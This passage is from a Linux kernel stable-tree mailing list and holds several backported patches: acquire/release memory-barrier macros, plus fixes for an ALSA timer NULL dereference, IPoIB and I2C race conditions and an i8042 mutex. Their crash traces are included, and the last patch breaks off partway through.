commit 47933ad41a86a4a9b50bed7c9b9bd2ba242aac63 upstream

A number of situations currently require the heavyweight smp_mb(),
even though there is no need to order prior stores against later
loads. Many architectures have much cheaper ways to handle these
situations, but the Linux kernel currently has no portable way
to make use of them.

This commit therefore supplies smp_load_acquire() and
smp_store_release() to remedy this situation. The new
smp_load_acquire() primitive orders the specified load against
any subsequent reads or writes, while the new smp_store_release()
primitive orders the specifed store against any prior reads or
writes. These primitives allow array-based circular FIFOs to be
implemented without an smp_mb(), and also allow a theoretical
hole in rcu_assign_pointer() to be closed at no additional
expense on most architectures.

In addition, the RCU experience transitioning from explicit
smp_read_barrier_depends() and smp_wmb() to rcu_dereference()
and rcu_assign_pointer(), respectively resulted in substantial
improvements in readability. It therefore seems likely that
replacing other explicit barriers with smp_load_acquire() and
smp_store_release() will provide similar benefits. It appears
that roughly half of the explicit barriers in core kernel code
might be so replaced.

[Changelog by PaulMck]

Reviewed-by: "Paul E. McKenney" <***@linux.vnet.ibm.com>
Signed-off-by: Peter Zijlstra <***@infradead.org>
Acked-by: Will Deacon <***@arm.com>
Cc: Benjamin Herrenschmidt <***@kernel.crashing.org>
Cc: Frederic Weisbecker <***@gmail.com>
Cc: Mathieu Desnoyers <***@polymtl.ca>
Cc: Michael Ellerman <***@ellerman.id.au>
Cc: Michael Neuling <***@neuling.org>
Cc: Russell King <***@arm.linux.org.uk>
Cc: Geert Uytterhoeven <***@linux-m68k.org>
Cc: Heiko Carstens <***@de.ibm.com>
Cc: Linus Torvalds <***@linux-foundation.org>
Cc: Martin Schwidefsky <***@de.ibm.com>
Cc: Victor Kaplansky <***@il.ibm.com>
Cc: Tony Luck <***@intel.com>
Cc: Oleg Nesterov <***@redhat.com>
Link: http://lkml.kernel.org/r/***@infradead.org
Signed-off-by: Ingo Molnar <***@kernel.org>
[wt: only backported to support next patch]

Signed-off-by: Willy Tarreau <***@1wt.eu>
---
arch/arm/include/asm/barrier.h | 15 +++++++++++
arch/arm64/include/asm/barrier.h | 50 +++++++++++++++++++++++++++++++++++++
arch/ia64/include/asm/barrier.h | 23 +++++++++++++++++
arch/metag/include/asm/barrier.h | 15 +++++++++++
arch/mips/include/asm/barrier.h | 15 +++++++++++
arch/powerpc/include/asm/barrier.h | 21 +++++++++++++++-
arch/s390/include/asm/barrier.h | 15 +++++++++++
arch/sparc/include/asm/barrier_64.h | 15 +++++++++++
arch/x86/include/asm/barrier.h | 43 ++++++++++++++++++++++++++++++-
include/asm-generic/barrier.h | 15 +++++++++++
include/linux/compiler.h | 9 +++++++
11 files changed, 234 insertions(+), 2 deletions(-)

diff --git a/arch/arm/include/asm/barrier.h b/arch/arm/include/asm/barrier.h
index 8dcd9c7..b00ef07 100644
--- a/arch/arm/include/asm/barrier.h
+++ b/arch/arm/include/asm/barrier.h
@@ -59,6 +59,21 @@
#define smp_wmb() dmb()
#endif

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#define read_barrier_depends() do { } while(0)
#define smp_read_barrier_depends() do { } while(0)

diff --git a/arch/arm64/include/asm/barrier.h b/arch/arm64/include/asm/barrier.h
index d4a6333..78e20ba 100644
--- a/arch/arm64/include/asm/barrier.h
+++ b/arch/arm64/include/asm/barrier.h
@@ -35,10 +35,60 @@
#define smp_mb() barrier()
#define smp_rmb() barrier()
#define smp_wmb() barrier()
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#else
+
#define smp_mb() asm volatile("dmb ish" : : : "memory")
#define smp_rmb() asm volatile("dmb ishld" : : : "memory")
#define smp_wmb() asm volatile("dmb ishst" : : : "memory")
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ switch (sizeof(*p)) { \
+ case 4: \
+ asm volatile ("stlr %w1, %0" \
+ : "=Q" (*p) : "r" (v) : "memory"); \
+ break; \
+ case 8: \
+ asm volatile ("stlr %1, %0" \
+ : "=Q" (*p) : "r" (v) : "memory"); \
+ break; \
+ } \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1; \
+ compiletime_assert_atomic_type(*p); \
+ switch (sizeof(*p)) { \
+ case 4: \
+ asm volatile ("ldar %w0, %1" \
+ : "=r" (___p1) : "Q" (*p) : "memory"); \
+ break; \
+ case 8: \
+ asm volatile ("ldar %0, %1" \
+ : "=r" (___p1) : "Q" (*p) : "memory"); \
+ break; \
+ } \
+ ___p1; \
+})
+
#endif

#define read_barrier_depends() do { } while(0)
diff --git a/arch/ia64/include/asm/barrier.h b/arch/ia64/include/asm/barrier.h
index 60576e0..d0a69aa 100644
--- a/arch/ia64/include/asm/barrier.h
+++ b/arch/ia64/include/asm/barrier.h
@@ -45,14 +45,37 @@
# define smp_rmb() rmb()
# define smp_wmb() wmb()
# define smp_read_barrier_depends() read_barrier_depends()
+
#else
+
# define smp_mb() barrier()
# define smp_rmb() barrier()
# define smp_wmb() barrier()
# define smp_read_barrier_depends() do { } while(0)
+
#endif

/*
+ * IA64 GCC turns volatile stores into st.rel and volatile loads into ld.acq no
+ * need for asm trickery!
+ */
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ___p1; \
+})
+
+/*
* XXX check on this ---I suspect what Linus really wants here is
* acquire vs release semantics but we can't discuss this stuff with
* Linus just yet. Grrr...
diff --git a/arch/metag/include/asm/barrier.h b/arch/metag/include/asm/barrier.h
index e355a4c..2d6f0de 100644
--- a/arch/metag/include/asm/barrier.h
+++ b/arch/metag/include/asm/barrier.h
@@ -85,4 +85,19 @@ static inline void fence(void)
#define smp_read_barrier_depends() do { } while (0)
#define set_mb(var, value) do { var = value; smp_mb(); } while (0)

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#endif /* _ASM_METAG_BARRIER_H */
diff --git a/arch/mips/include/asm/barrier.h b/arch/mips/include/asm/barrier.h
index 314ab55..52c5b61 100644
--- a/arch/mips/include/asm/barrier.h
+++ b/arch/mips/include/asm/barrier.h
@@ -180,4 +180,19 @@
#define nudge_writes() mb()
#endif

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#endif /* __ASM_BARRIER_H */
diff --git a/arch/powerpc/include/asm/barrier.h b/arch/powerpc/include/asm/barrier.h
index ae78225..f89da80 100644
--- a/arch/powerpc/include/asm/barrier.h
+++ b/arch/powerpc/include/asm/barrier.h
@@ -45,11 +45,15 @@
# define SMPWMB eieio
#endif

+#define __lwsync() __asm__ __volatile__ (stringify_in_c(LWSYNC) : : :"memory")
+
#define smp_mb() mb()
-#define smp_rmb() __asm__ __volatile__ (stringify_in_c(LWSYNC) : : :"memory")
+#define smp_rmb() __lwsync()
#define smp_wmb() __asm__ __volatile__ (stringify_in_c(SMPWMB) : : :"memory")
#define smp_read_barrier_depends() read_barrier_depends()
#else
+#define __lwsync() barrier()
+
#define smp_mb() barrier()
#define smp_rmb() barrier()
#define smp_wmb() barrier()
@@ -65,4 +69,19 @@
#define data_barrier(x) \
asm volatile("twi 0,%0,0; isync" : : "r" (x) : "memory");

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ __lwsync(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ __lwsync(); \
+ ___p1; \
+})
+
#endif /* _ASM_POWERPC_BARRIER_H */
diff --git a/arch/s390/include/asm/barrier.h b/arch/s390/include/asm/barrier.h
index 16760ee..578680f 100644
--- a/arch/s390/include/asm/barrier.h
+++ b/arch/s390/include/asm/barrier.h
@@ -32,4 +32,19 @@

#define set_mb(var, value) do { var = value; mb(); } while (0)

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ___p1; \
+})
+
#endif /* __ASM_BARRIER_H */
diff --git a/arch/sparc/include/asm/barrier_64.h b/arch/sparc/include/asm/barrier_64.h
index 95d4598..b5aad96 100644
--- a/arch/sparc/include/asm/barrier_64.h
+++ b/arch/sparc/include/asm/barrier_64.h
@@ -53,4 +53,19 @@ do { __asm__ __volatile__("ba,pt %%xcc, 1f\n\t" \

#define smp_read_barrier_depends() do { } while(0)

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ___p1; \
+})
+
#endif /* !(__SPARC64_BARRIER_H) */
diff --git a/arch/x86/include/asm/barrier.h b/arch/x86/include/asm/barrier.h
index c6cd358..04a4890 100644
--- a/arch/x86/include/asm/barrier.h
+++ b/arch/x86/include/asm/barrier.h
@@ -92,12 +92,53 @@
#endif
#define smp_read_barrier_depends() read_barrier_depends()
#define set_mb(var, value) do { (void)xchg(&var, value); } while (0)
-#else
+#else /* !SMP */
#define smp_mb() barrier()
#define smp_rmb() barrier()
#define smp_wmb() barrier()
#define smp_read_barrier_depends() do { } while (0)
#define set_mb(var, value) do { var = value; barrier(); } while (0)
+#endif /* SMP */
+
+#if defined(CONFIG_X86_OOSTORE) || defined(CONFIG_X86_PPRO_FENCE)
+
+/*
+ * For either of these options x86 doesn't have a strong TSO memory
+ * model and we should fall back to full barriers.
+ */
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
+#else /* regular x86 TSO memory ordering */
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ___p1; \
+})
+
#endif

/*
diff --git a/include/asm-generic/barrier.h b/include/asm-generic/barrier.h
index 639d7a4..01613b3 100644
--- a/include/asm-generic/barrier.h
+++ b/include/asm-generic/barrier.h
@@ -46,5 +46,20 @@
#define read_barrier_depends() do {} while (0)
#define smp_read_barrier_depends() do {} while (0)

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#endif /* !__ASSEMBLY__ */
#endif /* __ASM_GENERIC_BARRIER_H */
diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index a2ce6f8..6977192 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -302,6 +302,11 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
# define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
#endif

+/* Is this type a native word size -- useful for atomic operations */
+#ifndef __native_word
+# define __native_word(t) (sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
+#endif
+
/* Compile time object size, -1 for unknown */
#ifndef __compiletime_object_size
# define __compiletime_object_size(obj) -1
@@ -341,6 +346,10 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
#define compiletime_assert(condition, msg) \
_compiletime_assert(condition, msg, __compiletime_assert_, __LINE__)

+#define compiletime_assert_atomic_type(t) \
+ compiletime_assert(__native_word(t), \
+ "Need native word sized stores/loads for atomicity.")
+
/*
* Prevent the compiler from merging or refetching accesses. The compiler
* is also forbidden from reordering successive instances of ACCESS_ONCE(),
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:06 UTC
Permalink
From: Vegard Nossum <***@oracle.com>

commit 8ddc05638ee42b18ba4fe99b5fb647fa3ad20456 upstream.

I hit this with syzkaller:

kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] PREEMPT SMP KASAN
CPU: 0 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #190
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
task: ffff88011278d600 task.stack: ffff8801120c0000
RIP: 0010:[<ffffffff82c8ba07>] [<ffffffff82c8ba07>] snd_hrtimer_start+0x77/0x100
RSP: 0018:ffff8801120c7a60 EFLAGS: 00010006
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000007
RDX: 0000000000000009 RSI: 1ffff10023483091 RDI: 0000000000000048
RBP: ffff8801120c7a78 R08: ffff88011a5cf768 R09: ffff88011a5ba790
R10: 0000000000000002 R11: ffffed00234b9ef1 R12: ffff880114843980
R13: ffffffff84213c00 R14: ffff880114843ab0 R15: 0000000000000286
FS: 00007f72958f3700(0000) GS:ffff88011aa00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000603001 CR3: 00000001126ab000 CR4: 00000000000006f0
Stack:
ffff880114843980 ffff880111eb2dc0 ffff880114843a34 ffff8801120c7ad0
ffffffff82c81ab1 0000000000000000 ffffffff842138e0 0000000100000000
ffff880111eb2dd0 ffff880111eb2dc0 0000000000000001 ffff880111eb2dc0
Call Trace:
[<ffffffff82c81ab1>] snd_timer_start1+0x331/0x670
[<ffffffff82c85bfd>] snd_timer_start+0x5d/0xa0
[<ffffffff82c8795e>] snd_timer_user_ioctl+0x88e/0x2830
[<ffffffff8159f3a0>] ? __follow_pte.isra.49+0x430/0x430
[<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
[<ffffffff815a26fa>] ? do_wp_page+0x3aa/0x1c90
[<ffffffff8132762f>] ? put_prev_entity+0x108f/0x21a0
[<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
[<ffffffff816b0733>] do_vfs_ioctl+0x193/0x1050
[<ffffffff813510af>] ? cpuacct_account_field+0x12f/0x1a0
[<ffffffff816b05a0>] ? ioctl_preallocate+0x200/0x200
[<ffffffff81002f2f>] ? syscall_trace_enter+0x3cf/0xdb0
[<ffffffff815045ba>] ? __context_tracking_exit.part.4+0x9a/0x1e0
[<ffffffff81002b60>] ? exit_to_usermode_loop+0x190/0x190
[<ffffffff82001a97>] ? check_preemption_disabled+0x37/0x1e0
[<ffffffff81d93889>] ? security_file_ioctl+0x89/0xb0
[<ffffffff816b167f>] SyS_ioctl+0x8f/0xc0
[<ffffffff816b15f0>] ? do_vfs_ioctl+0x1050/0x1050
[<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
[<ffffffff83c32b2a>] entry_SYSCALL64_slow_path+0x25/0x25
Code: c7 c7 c4 b9 c8 82 48 89 d9 4c 89 ee e8 63 88 7f fe e8 7e 46 7b fe 48 8d 7b 48 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 04 84 c0 7e 65 80 7b 48 00 74 0e e8 52 46
RIP [<ffffffff82c8ba07>] snd_hrtimer_start+0x77/0x100
RSP <ffff8801120c7a60>
---[ end trace 5955b08db7f2b029 ]---

This can happen if snd_hrtimer_open() fails to allocate memory and
returns an error, which is currently not checked by snd_timer_open():

ioctl(SNDRV_TIMER_IOCTL_SELECT)
- snd_timer_user_tselect()
- snd_timer_close()
- snd_hrtimer_close()
- (struct snd_timer *) t->private_data = NULL
- snd_timer_open()
- snd_hrtimer_open()
- kzalloc() fails; t->private_data is still NULL

ioctl(SNDRV_TIMER_IOCTL_START)
- snd_timer_user_start()
- snd_timer_start()
- snd_timer_start1()
- snd_hrtimer_start()
- t->private_data == NULL // boom

[js] no put_device in 3.12 yet

Signed-off-by: Vegard Nossum <***@oracle.com>
Signed-off-by: Takashi Iwai <***@suse.de>
Signed-off-by: Jiri Slaby <***@suse.cz>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
sound/core/timer.c | 15 +++++++++++++--
1 file changed, 13 insertions(+), 2 deletions(-)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index f297eac..749857a 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -291,8 +291,19 @@ int snd_timer_open(struct snd_timer_instance **ti,
}
timeri->slave_class = tid->dev_sclass;
timeri->slave_id = slave_id;
- if (list_empty(&timer->open_list_head) && timer->hw.open)
- timer->hw.open(timer);
+
+ if (list_empty(&timer->open_list_head) && timer->hw.open) {
+ int err = timer->hw.open(timer);
+ if (err) {
+ kfree(timeri->owner);
+ kfree(timeri);
+
+ module_put(timer->module);
+ mutex_unlock(&register_mutex);
+ return err;
+ }
+ }
+
list_add_tail(&timeri->open_list, &timer->open_list_head);
snd_timer_check_master(timeri);
mutex_unlock(&register_mutex);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:06 UTC
Permalink
From: Alex Vesker <***@mellanox.com>

commit 344bacca8cd811809fc33a249f2738ab757d327f upstream.

This fix solves a race between light flush and on the fly joins.
Light flush doesn't set the device to down and unset IPOIB_OPER_UP
flag, this means that if while flushing we have a MC join in progress
and the QP was attached to BC MGID we can have a mismatches when
re-attaching a QP to the BC MGID.

The light flush would set the broadcast group to NULL causing an on
the fly join to rejoin and reattach to the BC MCG as well as adding
the BC MGID to the multicast list. The flush process would later on
remove the BC MGID and detach it from the QP. On the next flush
the BC MGID is present in the multicast list but not found when trying
to detach it because of the previous double attach and single detach.

[18332.714265] ------------[ cut here ]------------
[18332.717775] WARNING: CPU: 6 PID: 3767 at drivers/infiniband/core/verbs.c:280 ib_dealloc_pd+0xff/0x120 [ib_core]
...
[18332.775198] Hardware name: Red Hat KVM, BIOS Bochs 01/01/2011
[18332.779411] 0000000000000000 ffff8800b50dfbb0 ffffffff813fed47 0000000000000000
[18332.784960] 0000000000000000 ffff8800b50dfbf0 ffffffff8109add1 0000011832f58300
[18332.790547] ffff880226a596c0 ffff880032482000 ffff880032482830 ffff880226a59280
[18332.796199] Call Trace:
[18332.798015] [<ffffffff813fed47>] dump_stack+0x63/0x8c
[18332.801831] [<ffffffff8109add1>] __warn+0xd1/0xf0
[18332.805403] [<ffffffff8109aebd>] warn_slowpath_null+0x1d/0x20
[18332.809706] [<ffffffffa025d90f>] ib_dealloc_pd+0xff/0x120 [ib_core]
[18332.814384] [<ffffffffa04f3d7c>] ipoib_transport_dev_cleanup+0xfc/0x1d0 [ib_ipoib]
[18332.820031] [<ffffffffa04ed648>] ipoib_ib_dev_cleanup+0x98/0x110 [ib_ipoib]
[18332.825220] [<ffffffffa04e62c8>] ipoib_dev_cleanup+0x2d8/0x550 [ib_ipoib]
[18332.830290] [<ffffffffa04e656f>] ipoib_uninit+0x2f/0x40 [ib_ipoib]
[18332.834911] [<ffffffff81772a8a>] rollback_registered_many+0x1aa/0x2c0
[18332.839741] [<ffffffff81772bd1>] rollback_registered+0x31/0x40
[18332.844091] [<ffffffff81773b18>] unregister_netdevice_queue+0x48/0x80
[18332.848880] [<ffffffffa04f489b>] ipoib_vlan_delete+0x1fb/0x290 [ib_ipoib]
[18332.853848] [<ffffffffa04df1cd>] delete_child+0x7d/0xf0 [ib_ipoib]
[18332.858474] [<ffffffff81520c08>] dev_attr_store+0x18/0x30
[18332.862510] [<ffffffff8127fe4a>] sysfs_kf_write+0x3a/0x50
[18332.866349] [<ffffffff8127f4e0>] kernfs_fop_write+0x120/0x170
[18332.870471] [<ffffffff81207198>] __vfs_write+0x28/0xe0
[18332.874152] [<ffffffff810e09bf>] ? percpu_down_read+0x1f/0x50
[18332.878274] [<ffffffff81208062>] vfs_write+0xa2/0x1a0
[18332.881896] [<ffffffff812093a6>] SyS_write+0x46/0xa0
[18332.885632] [<ffffffff810039b7>] do_syscall_64+0x57/0xb0
[18332.889709] [<ffffffff81883321>] entry_SYSCALL64_slow_path+0x25/0x25
[18332.894727] ---[ end trace 09ebbe31f831ef17 ]---

Fixes: ee1e2c82c245 ("IPoIB: Refresh paths instead of flushing them on SM change events")
Signed-off-by: Alex Vesker <***@mellanox.com>
Signed-off-by: Leon Romanovsky <***@kernel.org>
Signed-off-by: Doug Ledford <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/infiniband/ulp/ipoib/ipoib_ib.c | 9 +++++++++
1 file changed, 9 insertions(+)

diff --git a/drivers/infiniband/ulp/ipoib/ipoib_ib.c b/drivers/infiniband/ulp/ipoib/ipoib_ib.c
index 2cfa76f..39168d3 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_ib.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_ib.c
@@ -979,8 +979,17 @@ static void __ipoib_ib_dev_flush(struct ipoib_dev_priv *priv,
}

if (level == IPOIB_FLUSH_LIGHT) {
+ int oper_up;
ipoib_mark_paths_invalid(dev);
+ /* Set IPoIB operation as down to prevent races between:
+ * the flush flow which leaves MCG and on the fly joins
+ * which can happen during that time. mcast restart task
+ * should deal with join requests we missed.
+ */
+ oper_up = test_and_clear_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
ipoib_mcast_dev_flush(dev);
+ if (oper_up)
+ set_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
}

if (level >= IPOIB_FLUSH_NORMAL)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:06 UTC
Permalink
From: Vladimir Zapolskiy <***@mentor.com>

commit 147b36d5b70c083cc76770c47d60b347e8eaf231 upstream.

Race condition between registering an I2C device driver and
deregistering an I2C adapter device which is assumed to manage that
I2C device may lead to a NULL pointer dereference due to the
uninitialized list head of driver clients.

The root cause of the issue is that the I2C bus may know about the
registered device driver and thus it is matched by bus_for_each_drv(),
but the list of clients is not initialized and commonly it is NULL,
because I2C device drivers define struct i2c_driver as static and
clients field is expected to be initialized by I2C core:

i2c_register_driver() i2c_del_adapter()
driver_register() ...
bus_add_driver() ...
... bus_for_each_drv(..., __process_removed_adapter)
... i2c_do_del_adapter()
... list_for_each_entry_safe(..., &driver->clients, ...)
INIT_LIST_HEAD(&driver->clients);

To solve the problem it is sufficient to do clients list head
initialization before calling driver_register().

The problem was found while using an I2C device driver with a sluggish
registration routine on a bus provided by a physically detachable I2C
master controller, but practically the oops may be reproduced under
the race between arbitraty I2C device driver registration and managing
I2C bus device removal e.g. by unbinding the latter over sysfs:

% echo 21a4000.i2c > /sys/bus/platform/drivers/imx-i2c/unbind
Unable to handle kernel NULL pointer dereference at virtual address 00000000
Internal error: Oops: 17 [#1] SMP ARM
CPU: 2 PID: 533 Comm: sh Not tainted 4.9.0-rc3+ #61
Hardware name: Freescale i.MX6 Quad/DualLite (Device Tree)
task: e5ada400 task.stack: e4936000
PC is at i2c_do_del_adapter+0x20/0xcc
LR is at __process_removed_adapter+0x14/0x1c
Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment none
Control: 10c5387d Table: 35bd004a DAC: 00000051
Process sh (pid: 533, stack limit = 0xe4936210)
Stack: (0xe4937d28 to 0xe4938000)
Backtrace:
[<c0667be0>] (i2c_do_del_adapter) from [<c0667cc0>] (__process_removed_adapter+0x14/0x1c)
[<c0667cac>] (__process_removed_adapter) from [<c0516998>] (bus_for_each_drv+0x6c/0xa0)
[<c051692c>] (bus_for_each_drv) from [<c06685ec>] (i2c_del_adapter+0xbc/0x284)
[<c0668530>] (i2c_del_adapter) from [<bf0110ec>] (i2c_imx_remove+0x44/0x164 [i2c_imx])
[<bf0110a8>] (i2c_imx_remove [i2c_imx]) from [<c051a838>] (platform_drv_remove+0x2c/0x44)
[<c051a80c>] (platform_drv_remove) from [<c05183d8>] (__device_release_driver+0x90/0x12c)
[<c0518348>] (__device_release_driver) from [<c051849c>] (device_release_driver+0x28/0x34)
[<c0518474>] (device_release_driver) from [<c0517150>] (unbind_store+0x80/0x104)
[<c05170d0>] (unbind_store) from [<c0516520>] (drv_attr_store+0x28/0x34)
[<c05164f8>] (drv_attr_store) from [<c0298acc>] (sysfs_kf_write+0x50/0x54)
[<c0298a7c>] (sysfs_kf_write) from [<c029801c>] (kernfs_fop_write+0x100/0x214)
[<c0297f1c>] (kernfs_fop_write) from [<c0220130>] (__vfs_write+0x34/0x120)
[<c02200fc>] (__vfs_write) from [<c0221088>] (vfs_write+0xa8/0x170)
[<c0220fe0>] (vfs_write) from [<c0221e74>] (SyS_write+0x4c/0xa8)
[<c0221e28>] (SyS_write) from [<c0108a20>] (ret_fast_syscall+0x0/0x1c)

Signed-off-by: Vladimir Zapolskiy <***@mentor.com>
Signed-off-by: Wolfram Sang <***@the-dreams.de>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/i2c/i2c-core.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/i2c/i2c-core.c b/drivers/i2c/i2c-core.c
index 9d539cb..c0e4143 100644
--- a/drivers/i2c/i2c-core.c
+++ b/drivers/i2c/i2c-core.c
@@ -1323,6 +1323,7 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver)
/* add the driver to the list of i2c drivers in the driver core */
driver->driver.owner = owner;
driver->driver.bus = &i2c_bus_type;
+ INIT_LIST_HEAD(&driver->clients);

/* When registration returns, the driver core
* will have called probe() for all matching-but-unbound devices.
@@ -1341,7 +1342,6 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver)

pr_debug("i2c-core: driver [%s] registered\n", driver->driver.name);

- INIT_LIST_HEAD(&driver->clients);
/* Walk the adapters that are already present */
i2c_for_each_dev(driver, __process_new_driver);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:06 UTC
Permalink
From: Dmitry Torokhov <***@gmail.com>

commit 47af45d684b5f3ae000ad448db02ce4f13f73273 upstream.

The commit 4097461897df ("Input: i8042 - break load dependency ...")
correctly set up ps2_cmd_mutex pointer for the KBD port but forgot to do
the same for AUX port(s), which results in communication on KBD and AUX
ports to clash with each other.

Fixes: 4097461897df ("Input: i8042 - break load dependency ...")
Reported-by: Bruno Wolff III <***@wolff.to>
Tested-by: Bruno Wolff III <***@wolff.to>
Signed-off-by: Dmitry Torokhov <***@gmail.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/input/serio/i8042.c | 1 +
1 file changed, 1 insertion(+)

diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c
index 2513c8a..2d8f959 100644
--- a/drivers/input/serio/i8042.c
+++ b/drivers/input/serio/i8042.c
@@ -1249,6 +1249,7 @@ static int __init i8042_create_aux_port(int idx)
serio->write = i8042_aux_write;
serio->start = i8042_start;
serio->stop = i8042_stop;
+ serio->ps2_cmd_mutex = &i8042_mutex;
serio->port_data = port;
serio->dev.parent = &i8042_platform_device->dev;
if (idx < 0) {
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:06 UTC
Permalink
From: Tariq Toukan <***@mellanox.com>

commit 5b810a242c28e1d8d64d718cebe75b79d86a0b2d upstream.

The real QP is destroyed in case of the ref count reaches zero, but
for XRC target QPs this call was missed and caused to QP leaks.

Let's call to destroy for all flows.

Fixes: 0e0ec7e0638e ('RDMA/core: Export ib_open_qp() to share XRC...')
Signed-off-by: Tariq Toukan <***@mellanox.com>
Signed-off-by: Noa Osherovich <***@mellanox.com>
Signed-off-by: Leon Romanovsky <***@kernel.org>
Signed-off-by: Doug Ledford <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/infiniband/core/uverbs_main.c | 7 ++-----
1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c
index f50623d..37b7207 100644
--- a/drivers/infiniband/core/uverbs_main.c
